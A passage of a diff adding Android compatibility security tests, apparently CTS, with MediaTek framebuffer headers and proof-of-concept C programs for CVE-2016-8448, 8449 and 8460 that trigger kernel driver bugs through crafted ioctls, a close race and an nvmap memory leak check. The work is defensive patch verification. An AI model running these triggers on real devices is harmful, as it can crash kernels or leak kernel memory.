+#define MTKFB_RESET_UPDATESPEED MTK_IO(53)
+#define MTKFB_SET_UI_LAYER_ALPHA MTK_IOW(54, unsigned long)
+#define MTKFB_SET_UI_LAYER_SRCKEY MTK_IOW(55, unsigned long)
+
+#define MTKFB_GET_MAX_DISPLAY_COUNT MTK_IOR(56, unsigned int)
+#define MTKFB_SET_FB_LAYER_SECURE MTK_IOW(57, int)
+/**
+ * @}
+ */
+/* ---------------------------------------------------------------------- */
+
+/* -------------------------------------------------------------------------- */
+
+typedef enum {
+ MTK_FB_ORIENTATION_0 = 0,
+ MTK_FB_ORIENTATION_90 = 1,
+ MTK_FB_ORIENTATION_180 = 2,
+ MTK_FB_ORIENTATION_270 = 3,
+} MTK_FB_ORIENTATION;
+
+
+typedef enum {
+ MTK_FB_TV_SYSTEM_NTSC = 0,
+ MTK_FB_TV_SYSTEM_PAL = 1,
+} MTK_FB_TV_SYSTEM;
+
+
+typedef enum {
+ MTK_FB_TV_FMT_RGB565 = 0,
+ MTK_FB_TV_FMT_YUV420_SEQ = 1,
+ MTK_FB_TV_FMT_UYUV422 = 2,
+ MTK_FB_TV_FMT_YUV420_BLK = 3,
+} MTK_FB_TV_SRC_FORMAT;
+
+typedef enum {
+ LAYER_NORMAL_BUFFER = 0,
+ LAYER_SECURE_BUFFER = 1,
+ LAYER_PROTECTED_BUFFER = 2,
+ LAYER_SECURE_BUFFER_WITH_ALIGN = 0x10001, /* the higher 16 bits =1 for adding 64 bytes alignment */
+} MTK_FB_OVL_LAYER_SECURE_MODE;
+
+typedef struct _disp_dfo_item {
+ char name[32];
+ int value;
+} disp_dfo_item_t;
+
+/* -------------------------------------------------------------------------- */
+struct fb_slt_catpure {
+ MTK_FB_FORMAT format;
+
+ volatile char *outputBuffer;
+ unsigned int wdma_width;
+ unsigned int wdma_height;
+};
+
+struct fb_scale {
+ unsigned int xscale, yscale;
+};
+
+struct fb_frame_offset {
+ unsigned int idx;
+ unsigned long offset;
+};
+
+struct fb_update_window {
+ unsigned int x, y;
+ unsigned int width, height;
+};
+
+typedef enum {
+ LAYER_2D = 0,
+ LAYER_3D_SBS_0 = 0x1,
+ LAYER_3D_SBS_90 = 0x2,
+ LAYER_3D_SBS_180 = 0x3,
+ LAYER_3D_SBS_270 = 0x4,
+ LAYER_3D_TAB_0 = 0x10,
+ LAYER_3D_TAB_90 = 0x20,
+ LAYER_3D_TAB_180 = 0x30,
+ LAYER_3D_TAB_270 = 0x40,
+} MTK_FB_LAYER_TYPE;
+
+typedef enum {
+ DISP_DIRECT_LINK_MODE,
+ DISP_DECOUPLE_MODE
+} MTK_DISP_MODE;
+struct fb_overlay_mode {
+ MTK_DISP_MODE mode;
+};
+
+typedef enum { /* map sessions to scenairos in kernel driver */
+ DISP_SESSION_LCM = 1 << 0, /* DSI0 */
+ DISP_SESSION_MEM = 1 << 1, /* OVL0->WDMA0 */
+/* Extension mode, Dst buf is provided by user,for Wifi Display or other purpose */
+ DISP_SESSION_WFD = 1 << 2,
+ DISP_SESSION_MHL = 1 << 3, /* DPI */
+ DISP_SESSION_LCM1 = 1 << 4, /* DSI1 */
+ DISP_SESSION_MEM1 = 1 << 5, /* OVL1->WDMA1 */
+ /* TODO:can be extended with other Session Id */
+ SESSION_MASK = 0xff & ~(1 << 6)
+} MTK_DISP_SESSION;
+
+struct fb_overlay_session {
+ unsigned int session; /* one or more @MTK_DISP_SESSION combined */
+};
+
+struct fb_overlay_decouple {
+ MTK_DISP_MODE mode;
+ unsigned int session;
+};
+struct fb_overlay_buffer {
+ /* Input */
+ int layer_id;
+ unsigned int layer_en;
+ int ion_fd;
+ unsigned int cache_sync;
+ /* Output */
+ unsigned int index;
+ int fence_fd;
+};
+
+struct fb_overlay_layer {
+ unsigned int layer_id;
+ unsigned int layer_enable;
+
+ void *src_base_addr;
+ void *src_phy_addr;
+ unsigned int src_direct_link;
+ MTK_FB_FORMAT src_fmt;
+ unsigned int src_use_color_key;
+ unsigned int src_color_key;
+ unsigned int src_pitch;
+ unsigned int src_offset_x, src_offset_y;
+ unsigned int src_width, src_height;
+
+ unsigned int tgt_offset_x, tgt_offset_y;
+ unsigned int tgt_width, tgt_height;
+ MTK_FB_ORIENTATION layer_rotation;
+ MTK_FB_LAYER_TYPE layer_type;
+ MTK_FB_ORIENTATION video_rotation;
+
+ unsigned int isTdshp; /* set to 1, will go through tdshp first, then layer blending, then to color */
+
+ int next_buff_idx;
+ int identity;
+ int connected_type;
+ unsigned int security;
+ unsigned int alpha_enable;
+ unsigned int alpha;
+ int fence_fd; /* 8135 */
+ int ion_fd; /* 8135 CL 2340210 */
+};
+
+struct fb_overlay_config {
+ int fence;
+ int time;
+ struct fb_overlay_layer layers[4];
+};
+
+struct fb_overlay_buffer_info {
+ unsigned int src_vir_addr;
+ unsigned int size;
+};
+
+struct fb_overlay_layer_info {
+ unsigned int layer_id;
+ unsigned int layer_enabled; /* TO BE DEL */
+ unsigned int curr_en;
+ unsigned int next_en;
+ unsigned int hw_en;
+ int curr_idx;
+ int next_idx;
+ int hw_idx;
+ int curr_identity;
+ int next_identity;
+ int hw_identity;
+ int curr_conn_type;
+ int next_conn_type;
+ int hw_conn_type;
+ MTK_FB_ORIENTATION layer_rotation;
+};
+/* -------------------------------------------------------------------------- */
+
+struct fb_post_video_buffer {
+ void *phy_addr;
+ void *vir_addr;
+ MTK_FB_TV_SRC_FORMAT format;
+ unsigned int width, height;
+};
+
+#if defined(CONFIG_ARCH_MT6735) || defined(CONFIG_ARCH_MT6735M) || defined(CONFIG_ARCH_MT6753)
+extern unsigned int EnableVSyncLog;
+
+void mtkfb_log_enable(int enable);
+int mtkfb_set_backlight_mode(unsigned int mode);
+int mtkfb_set_backlight_level(unsigned int level);
+int mtkfb_get_debug_state(char *stringbuf, int buf_len);
+unsigned int mtkfb_fm_auto_test(void);
+void mtkfb_clear_lcm(void);
+#endif /* CONFIG_ARCH_MT6735 */
+
+#ifdef __KERNEL__
+
+#include <linux/completion.h>
+#include <linux/interrupt.h>
+#include <linux/workqueue.h>
+#include <linux/version.h>
+#include <../drivers/staging/android/sw_sync.h>
+
+
+#define MTKFB_DRIVER "mtkfb"
+
+enum mtkfb_state {
+ MTKFB_DISABLED = 0,
+ MTKFB_SUSPENDED = 99,
+ MTKFB_ACTIVE = 100
+};
+
+typedef enum {
+ MTKFB_LAYER_ENABLE_DIRTY = (1 << 0),
+ MTKFB_LAYER_FORMAT_DIRTY = (1 << 1),
+ MTKFB_LAYER_SET_DIRTY = (1 << 2),
+} MTKFB_LAYER_CONFIG_DIRTY;
+
+typedef struct {
+ struct work_struct work;
+ struct list_head list;
+ struct fb_overlay_config config;
+ struct sync_fence *fences[4];
+ struct ion_handle *ion_handles[4];
+ void *dev;
+} update_ovls_work_t;
+
+struct mtkfb_device {
+ int state;
+ void *fb_va_base; /* MPU virtual address */
+ dma_addr_t fb_pa_base; /* Bus physical address */
+ unsigned long fb_size_in_byte;
+ void *ovl_va_base; /* MPU virtual address */
+ dma_addr_t ovl_pa_base; /* Bus physical address */
+ unsigned long ovl_size_in_byte;
+
+ unsigned long layer_enable;
+ MTK_FB_FORMAT *layer_format;
+ unsigned int layer_config_dirty;
+
+ int xscale, yscale, mirror; /* transformations.
+ rotate is stored in fb_info->var */
+ u32 pseudo_palette[17];
+
+ struct fb_info *fb_info; /* Linux fbdev framework data */
+ struct device *dev;
+
+ /* Android native fence support */
+ struct workqueue_struct *update_ovls_wq;
+ struct mutex timeline_lock;
+ struct sw_sync_timeline *timeline;
+ int timeline_max;
+ struct list_head pending_configs; /* CL2340210 */
+ struct ion_client *ion_client;
+};
+
+#endif /* __KERNEL__ */
+
+extern long hdmi_handle_cmd(unsigned int cmd, unsigned long arg);
+
+#if defined(CONFIG_ARCH_MT6797)
+extern unsigned int vramsize;
+#endif
+
+#if defined(CONFIG_ARCH_MT6735) || defined(CONFIG_ARCH_MT6735M) || defined(CONFIG_ARCH_MT6753)
+extern bool is_early_suspended;
+extern void mtkfb_waitVsync(void);
+extern bool is_ipoh_bootup;
+
+#ifdef CONFIG_OF
+int _parse_tag_videolfb(void);
+extern unsigned int islcmconnected;
+extern unsigned int vramsize;
+#else
+extern char *saved_command_line;
+#endif
+#endif /* CONFIG_ARCH_MT6735 */
+
+
+#endif /* __MTKFB_H */
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8448/mtkfb_info.h b/hostsidetests/security/securityPatch/CVE-2016-8448/mtkfb_info.h
new file mode 100644
index 0000000..61e7cfd
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8448/mtkfb_info.h
@@ -0,0 +1,101 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#ifndef __MTKFB_INFO_H__
+#define __MTKFB_INFO_H__
+
+#ifdef __cplusplus
+extern "C" {
+#endif
+
+
+ typedef enum {
+ DISPIF_TYPE_DBI = 0,
+ DISPIF_TYPE_DPI,
+ DISPIF_TYPE_DSI,
+ DISPIF_TYPE_DPI0,
+ DISPIF_TYPE_DPI1,
+ DISPIF_TYPE_DSI0,
+ DISPIF_TYPE_DSI1,
+ HDMI = 7,
+ HDMI_SMARTBOOK,
+ MHL,
+ DISPIF_TYPE_EPD,
+ SLIMPORT
+ } MTKFB_DISPIF_TYPE;
+
+ typedef enum {
+ MTKFB_DISPIF_PRIMARY_LCD = 0,
+ MTKFB_DISPIF_HDMI,
+ MTKFB_DISPIF_EPD,
+ MTKFB_MAX_DISPLAY_COUNT
+ } MTKFB_DISPIF_DEVICE_TYPE;
+
+ typedef enum {
+ DISPIF_FORMAT_RGB565 = 0,
+ DISPIF_FORMAT_RGB666,
+ DISPIF_FORMAT_RGB888
+ } MTKFB_DISPIF_FORMAT;
+
+
+ typedef enum {
+ DISPIF_MODE_VIDEO = 0,
+ DISPIF_MODE_COMMAND
+ } MTKFB_DISPIF_MODE;
+
+ typedef struct mtk_dispif_info {
+ unsigned int display_id;
+ unsigned int isHwVsyncAvailable;
+ MTKFB_DISPIF_TYPE displayType;
+ unsigned int displayWidth;
+ unsigned int displayHeight;
+ unsigned int displayFormat;
+ MTKFB_DISPIF_MODE displayMode;
+ unsigned int vsyncFPS;
+ unsigned int physicalWidth;
+ unsigned int physicalHeight;
+ unsigned int isConnected;
+/* this value is for DFO Multi-Resolution feature, which stores the original LCM Wdith */
+ unsigned int lcmOriginalWidth;
+/* this value is for DFO Multi-Resolution feature, which stores the original LCM Height */
+ unsigned int lcmOriginalHeight;
+ } mtk_dispif_info_t;
+
+#define MAKE_MTK_FB_FORMAT_ID(id, bpp) (((id) << 8) | (bpp))
+
+ typedef enum {
+ MTK_FB_FORMAT_UNKNOWN = 0,
+
+ MTK_FB_FORMAT_RGB565 = MAKE_MTK_FB_FORMAT_ID(1, 2),
+ MTK_FB_FORMAT_RGB888 = MAKE_MTK_FB_FORMAT_ID(2, 3),
+ MTK_FB_FORMAT_BGR888 = MAKE_MTK_FB_FORMAT_ID(3, 3),
+ MTK_FB_FORMAT_ARGB8888 = MAKE_MTK_FB_FORMAT_ID(4, 4),
+ MTK_FB_FORMAT_ABGR8888 = MAKE_MTK_FB_FORMAT_ID(5, 4),
+ MTK_FB_FORMAT_YUV422 = MAKE_MTK_FB_FORMAT_ID(6, 2),
+ MTK_FB_FORMAT_XRGB8888 = MAKE_MTK_FB_FORMAT_ID(7, 4),
+ MTK_FB_FORMAT_XBGR8888 = MAKE_MTK_FB_FORMAT_ID(8, 4),
+ MTK_FB_FORMAT_UYVY = MAKE_MTK_FB_FORMAT_ID(9, 2),
+ MTK_FB_FORMAT_YUV420_P = MAKE_MTK_FB_FORMAT_ID(10, 2),
+ MTK_FB_FORMAT_YUY2 = MAKE_MTK_FB_FORMAT_ID(11, 2),
+ MTK_FB_FORMAT_BPP_MASK = 0xFF,
+ } MTK_FB_FORMAT;
+
+#define GET_MTK_FB_FORMAT_BPP(f) ((f) & MTK_FB_FORMAT_BPP_MASK)
+
+
+#ifdef __cplusplus
+}
+#endif
+#endif /* __DISP_DRV_H__ */
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8448/poc.c b/hostsidetests/security/securityPatch/CVE-2016-8448/poc.c
new file mode 100644
index 0000000..e5f675b
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8448/poc.c
@@ -0,0 +1,59 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#include <sys/mman.h>
+#include <fcntl.h>
+//#include <pthread.h>
+#include <sys/prctl.h>
+#include <unistd.h>
+#include <stdbool.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <asm-generic/ioctl.h>
+#include "mtkfb.h"
+int main(int argc, char **argv) {
+ int fd = 0;
+ struct fb_overlay_layer layerInfo;
+ memset(&layerInfo, 0, sizeof(layerInfo));
+ fd = open("/dev/graphics/fb0", O_RDWR);
+ if (fd < 0) {
+ perror("open /dev/graphics/fb0");
+ exit(-1);
+ }
+ printf("Device file opened successfully\n");
+ printf("Trying to get layer info\n");
+ if(ioctl(fd, MTKFB_GET_OVERLAY_LAYER_INFO, &layerInfo) == -1) {
+ perror("ioctl MTKFB_GET_OVERLAY_LAYER_INFO failed");
+ exit(-2);
+ }
+ printf("Got layer info\n");
+ printf("Trying to set layer info\n");
+ // set any huge value here
+ int curr_val = 0xf1111111;
+ while(1) {
+ layerInfo.layer_id = curr_val;
+ if(ioctl(fd, MTKFB_SET_OVERLAY_LAYER, &layerInfo) == -1) {
+ perror("ioctl MTKFB_SET_OVERLAY_LAYER failed");
+ //exit(-2);
+ }
+ curr_val--;
+ if(curr_val == -1) {
+ break;
+ }
+ }
+ printf("Set layer info\n");
+ return 0;
+}
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8449/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-8449/Android.mk
new file mode 100644
index 0000000..ce1e1bb
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8449/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-8449
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8449/poc.c b/hostsidetests/security/securityPatch/CVE-2016-8449/poc.c
new file mode 100755
index 0000000..1e76b55
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8449/poc.c
@@ -0,0 +1,143 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <stdio.h>
+#include <string.h>
+#include <errno.h>
+#include <stdlib.h>
+#include <pthread.h>
+#include <sys/ioctl.h>
+#include <sys/mman.h>
+#include <errno.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <sched.h>
+#include <sys/types.h>
+#include <signal.h>
+#include <unistd.h>
+
+#define LOG(fmt, ...) printf(fmt "\n", ##__VA_ARGS__)
+#define ERR(fmt, ...) printf(fmt ": %d(%s)\n", ##__VA_ARGS__, errno, strerror(errno))
+#define ARRAY_SIZE(a) (sizeof(a) / sizeof((a)[0]))
+#define CLOSE_THREAD_NUM 100
+#define TRY_TIMES 900
+
+#define DEV "/dev/tegra_avpchannel"
+
+#define NVAVP_IOCTL_MAGIC 'n'
+
+struct nvavp_channel_open_args {
+ __u32 channel_fd;
+};
+
+#define NVAVP_IOCTL_CHANNEL_OPEN _IOR(NVAVP_IOCTL_MAGIC, 0x73, \
+ struct nvavp_channel_open_args)
+
+int fd;
+pthread_t close_thread_id[CLOSE_THREAD_NUM] = { 0 };
+
+static int set_affinity(int num)
+{
+ int ret = 0;
+ cpu_set_t mask;
+ CPU_ZERO(&mask);
+ CPU_SET(num, &mask);
+ ret = sched_setaffinity(0, sizeof(cpu_set_t), &mask);
+ if(ret == -1){
+ ERR("[-] set affinity failed");
+ }
+ return ret;
+}
+
+volatile int target_fd;
+volatile int attack;
+void* close_thread(void* no_use)
+{
+ set_affinity(1);
+
+ while(attack){
+ close(target_fd);
+ }
+
+ return NULL;
+}
+
+int main()
+{
+ int i, try_time = TRY_TIMES, ret;
+ struct nvavp_channel_open_args o_args = { 0 };
+
+ /* bind_cpu */
+ set_affinity(0);
+
+ /* open dev */
+ fd = open(DEV, O_RDONLY);
+ if(fd == -1){
+ ERR("[-] open failed");
+ return 0;
+ } else {
+ LOG("[+] open OK");
+ }
+
+ #if 1
+ ret = ioctl(fd, NVAVP_IOCTL_CHANNEL_OPEN, &o_args);
+ if(ret == -1) {
+ ERR("[-] ioctl failed");
+ goto out_dev;
+ } else {
+ LOG("[+] ioctl OK, fd = %d", o_args.channel_fd);
+ }
+
+ target_fd = o_args.channel_fd;
+ #endif
+
+ /* create close thread */
+ #if 1
+ attack = 1;
+ for(i = 0; i < CLOSE_THREAD_NUM; i++){
+ ret = pthread_create(close_thread_id + i, NULL, close_thread, NULL);
+ if(ret){
+ ERR("[-] create close thread %d failed", i);
+ goto out_close_thread;
+ }
+ }
+ #endif
+
+ #if 1
+ for(i = 0; i < TRY_TIMES; i++){
+ LOG("[+] %03d times", i);
+ /* open */
+ ret = ioctl(fd, NVAVP_IOCTL_CHANNEL_OPEN, &o_args);
+ if(ret == -1) {
+ ERR("[-] ioctl failed");
+ } else {
+ LOG("[+] ioctl OK, fd = %d", o_args.channel_fd);
+ }
+ //usleep(200);
+ }
+ #endif
+
+out_close_thread:
+ attack = 0;
+ /* kill close thread */
+ for(i = 0; i < CLOSE_THREAD_NUM; i++){
+ if(close_thread_id[i])
+ pthread_join(close_thread_id[i], NULL);
+ }
+out_dev:
+ close(fd);
+ return 0;
+}
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8460/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-8460/Android.mk
new file mode 100644
index 0000000..b9c51d1
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8460/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-8460
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS := -Wall -W -g -O2 -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8460/poc.c b/hostsidetests/security/securityPatch/CVE-2016-8460/poc.c
new file mode 100755
index 0000000..78d41e5
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8460/poc.c
@@ -0,0 +1,165 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <unistd.h>
+#include <errno.h>
+#include <stdio.h>
+#include <dirent.h>
+#include <string.h>
+#include <sys/stat.h>
+#include <sys/ioctl.h>
+#include <stdio.h>
+#include <string.h>
+#include <dlfcn.h>
+#include <sys/time.h>
+#include <sys/mman.h>
+#include <sys/syscall.h>
+#include <sys/resource.h>
+#include <fcntl.h>
+#include <pthread.h>
+#include <unistd.h>
+#include <sched.h>
+
+
+struct nvmap_handle_param {
+ __u32 handle; /* nvmap handle */
+ __u32 param; /* size/align/base/heap etc. */
+ unsigned long result; /* returns requested info*/
+};
+
+struct nvmap_create_handle {
+ union {
+ __u32 id; /* FromId */
+ __u32 size; /* CreateHandle */
+ __s32 fd; /* DmaBufFd or FromFd */
+ };
+ __u32 handle; /* returns nvmap handle */
+};
+
+struct nvmap_pin_handle {
+ __u32 *handles; /* array of handles to pin/unpin */
+ unsigned long *addr; /* array of addresses to return */
+ __u32 count; /* number of entries in handles */
+};
+
+struct nvmap_alloc_handle {
+ __u32 handle; /* nvmap handle */
+ __u32 heap_mask; /* heaps to allocate from */
+ __u32 flags; /* wb/wc/uc/iwb etc. */
+ __u32 align; /* min alignment necessary */
+};
+
+struct nvmap_pin_handle_32 {
+ __u32 handles; /* array of handles to pin/unpin */
+ __u32 addr; /* array of addresses to return */
+ __u32 count; /* number of entries in handles */
+};
+
+struct nvmap_map_caller_32 {
+ __u32 handle; /* nvmap handle */
+ __u32 offset; /* offset into hmem; should be page-aligned */
+ __u32 length; /* number of bytes to map */
+ __u32 flags; /* maps as wb/iwb etc. */
+ __u32 addr; /* user pointer*/
+};
+
+#define NVMAP_IOC_MAGIC 'N'
+#define NVMAP_IOC_CREATE _IOWR(NVMAP_IOC_MAGIC, 0, struct nvmap_create_handle)
+#define NVMAP_IOC_PIN_MULT _IOWR(NVMAP_IOC_MAGIC, 10, struct nvmap_pin_handle)
+#define NVMAP_IOC_ALLOC _IOW(NVMAP_IOC_MAGIC, 3, struct nvmap_alloc_handle)
+#define NVMAP_IOC_PIN_MULT_32 _IOWR(NVMAP_IOC_MAGIC, 10, struct nvmap_pin_handle_32)
+#define NVMAP_IOC_MMAP_32 _IOWR(NVMAP_IOC_MAGIC, 5, struct nvmap_map_caller_32)
+
+/* common carveout heaps */
+#define NVMAP_HEAP_CARVEOUT_IRAM (1ul<<29)
+#define NVMAP_HEAP_CARVEOUT_VPR (1ul<<28)
+#define NVMAP_HEAP_CARVEOUT_TSEC (1ul<<27)
+#define NVMAP_HEAP_CARVEOUT_GENERIC (1ul<<0)
+
+#define NVMAP_HEAP_CARVEOUT_MASK (NVMAP_HEAP_IOVMM - 1)
+
+/* allocation flags */
+#define NVMAP_HANDLE_UNCACHEABLE (0x0ul << 0)
+#define NVMAP_HANDLE_WRITE_COMBINE (0x1ul << 0)
+#define NVMAP_HANDLE_INNER_CACHEABLE (0x2ul << 0)
+#define NVMAP_HANDLE_CACHEABLE (0x3ul << 0)
+#define NVMAP_HANDLE_CACHE_FLAG (0x3ul << 0)
+
+#define NVMAP_HANDLE_SECURE (0x1ul << 2)
+#define NVMAP_HANDLE_KIND_SPECIFIED (0x1ul << 3)
+#define NVMAP_HANDLE_COMPR_SPECIFIED (0x1ul << 4)
+#define NVMAP_HANDLE_ZEROED_PAGES (0x1ul << 5)
+#define NVMAP_HANDLE_PHYS_CONTIG (0x1ul << 6)
+#define NVMAP_HANDLE_CACHE_SYNC (0x1ul << 7)
+
+
+int g_fd = -1;
+
+int open_driver() {
+ char* dev_path = "/dev/nvmap";
+ g_fd = open(dev_path, O_RDWR);
+ return g_fd;
+}
+
+
+int main(int argc, char**argv) {
+ if (open_driver() < 0) {
+ return -1;
+ }
+
+ int i;
+ int* handles = mmap((void*)0x20000000, 0x1000, PROT_READ | PROT_WRITE , MAP_FIXED | MAP_SHARED | MAP_ANONYMOUS, -1, 0);
+ memset(handles, 0x42, 0x1000);
+ for (i = 0; i < 2; ++i) {
+ struct nvmap_create_handle op = {0};
+ op.size = 0x1000;
+ ioctl(g_fd, NVMAP_IOC_CREATE, &op);
+ handles[i] = op.handle;
+ struct nvmap_alloc_handle alloc = {0};
+ alloc.align = 0x1000;
+ alloc.handle = op.handle;
+ alloc.heap_mask = NVMAP_HEAP_CARVEOUT_GENERIC;
+ alloc.flags = NVMAP_HANDLE_ZEROED_PAGES;
+ ioctl(g_fd, NVMAP_IOC_ALLOC, &alloc);
+ }
+
+ void* leak_addr = (void*) 0x10001000;
+ void* mmap_addr = mmap(leak_addr, 0x1000, PROT_READ | PROT_WRITE , MAP_FIXED | MAP_SHARED | MAP_ANONYMOUS, -1, 0);
+ memset(leak_addr, 0x41, 0x1000);
+
+ unsigned long leaked_data = 0;
+ struct nvmap_pin_handle_32 pin = {0};
+ pin.count = 2;
+ pin.handles = (unsigned int) handles;
+ struct nvmap_pin_handle err_pin = {0};
+ err_pin.count = 0;
+ err_pin.handles = handles;
+ err_pin.addr = leak_addr + 8;
+
+ ioctl(g_fd, NVMAP_IOC_PIN_MULT, &err_pin); // construct op.addr
+ ioctl(g_fd, NVMAP_IOC_PIN_MULT_32, &pin);
+
+ for (i = 0; i < 10; ++i) {
+ if(((int*)leak_addr)[i] != 0x41414141 && 0 == leaked_data) {
+ leaked_data = (unsigned long)((int*)leak_addr) + i;
+ }
+ }
+
+ if (leaked_data) {
+ printf("Vulnerable");
+ }
+ return 0;
+}
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8482/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-8482/Android.mk
new file mode 100644
index 0000000..b41fb16
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8482/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-8482
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
